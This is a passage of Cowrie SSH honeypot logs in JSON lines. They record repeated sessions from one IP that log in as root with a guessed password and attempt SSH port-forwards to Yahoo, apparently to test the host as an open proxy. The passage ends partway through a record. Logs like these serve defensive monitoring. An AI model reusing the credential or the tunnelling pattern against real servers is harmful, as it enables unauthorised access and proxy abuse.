{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.277727Z","src_ip":"213.209.150.239","session":"20750ab155d5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48794,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c4d8336f87","protocol":"ssh","message":"New connection: 213.209.150.239:48794 (1.2.3.4:22) [session: 28c4d8336f87]","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.323448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.324385Z","src_ip":"213.209.150.239","session":"28c4d8336f87"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.371374Z","src_ip":"213.209.150.239","session":"28c4d8336f87"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.605911Z","src_ip":"213.209.150.239","session":"28c4d8336f87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15393,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15393","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.654459Z","session":"28c4d8336f87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.701699Z","src_ip":"213.209.150.239","session":"28c4d8336f87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":14861,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14861","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.837440Z","session":"28c4d8336f87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.884467Z","src_ip":"213.209.150.239","session":"28c4d8336f87"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.932219Z","src_ip":"213.209.150.239","session":"28c4d8336f87"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48837,"dst_ip":"1.2.3.4","dst_port":22,"session":"51690d383406","protocol":"ssh","message":"New connection: 213.209.150.239:48837 (1.2.3.4:22) [session: 51690d383406]","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.978489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.979205Z","src_ip":"213.209.150.239","session":"51690d383406"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.026360Z","src_ip":"213.209.150.239","session":"51690d383406"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.260886Z","src_ip":"213.209.150.239","session":"51690d383406"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25651,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25651","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.308821Z","session":"51690d383406"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.356071Z","src_ip":"213.209.150.239","session":"51690d383406"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":1,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.493406Z","session":"51690d383406"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.540883Z","src_ip":"213.209.150.239","session":"51690d383406"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.588767Z","src_ip":"213.209.150.239","session":"51690d383406"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48895,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf2bdcad10ec","protocol":"ssh","message":"New connection: 213.209.150.239:48895 (1.2.3.4:22) [session: cf2bdcad10ec]","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.635167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.636437Z","src_ip":"213.209.150.239","session":"cf2bdcad10ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.683699Z","src_ip":"213.209.150.239","session":"cf2bdcad10ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.918605Z","src_ip":"213.209.150.239","session":"cf2bdcad10ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32433,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32433","sensor":"my-vps","timestamp":"2025-08-26T01:07:40.966852Z","session":"cf2bdcad10ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.014138Z","src_ip":"213.209.150.239","session":"cf2bdcad10ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":32614,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32614","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.149573Z","session":"cf2bdcad10ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.196733Z","src_ip":"213.209.150.239","session":"cf2bdcad10ec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.245391Z","src_ip":"213.209.150.239","session":"cf2bdcad10ec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48955,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea41823ae512","protocol":"ssh","message":"New connection: 213.209.150.239:48955 (1.2.3.4:22) [session: ea41823ae512]","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.300904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.301732Z","src_ip":"213.209.150.239","session":"ea41823ae512"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.358043Z","src_ip":"213.209.150.239","session":"ea41823ae512"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.640002Z","src_ip":"213.209.150.239","session":"ea41823ae512"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":32538,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32538","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.697423Z","session":"ea41823ae512"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.754201Z","src_ip":"213.209.150.239","session":"ea41823ae512"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":3293,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3293","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.911061Z","session":"ea41823ae512"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:41.967781Z","src_ip":"213.209.150.239","session":"ea41823ae512"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.025605Z","src_ip":"213.209.150.239","session":"ea41823ae512"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49007,"dst_ip":"1.2.3.4","dst_port":22,"session":"299b144deb5b","protocol":"ssh","message":"New connection: 213.209.150.239:49007 (1.2.3.4:22) [session: 299b144deb5b]","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.081279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.082332Z","src_ip":"213.209.150.239","session":"299b144deb5b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.139190Z","src_ip":"213.209.150.239","session":"299b144deb5b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.422173Z","src_ip":"213.209.150.239","session":"299b144deb5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19775,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19775","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.481500Z","session":"299b144deb5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.538455Z","src_ip":"213.209.150.239","session":"299b144deb5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11738,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11738","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.695027Z","session":"299b144deb5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.751781Z","src_ip":"213.209.150.239","session":"299b144deb5b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.809430Z","src_ip":"213.209.150.239","session":"299b144deb5b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49072,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc2da5d13e98","protocol":"ssh","message":"New connection: 213.209.150.239:49072 (1.2.3.4:22) [session: dc2da5d13e98]","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.855335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:42.856000Z","src_ip":"213.209.150.239","session":"dc2da5d13e98"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"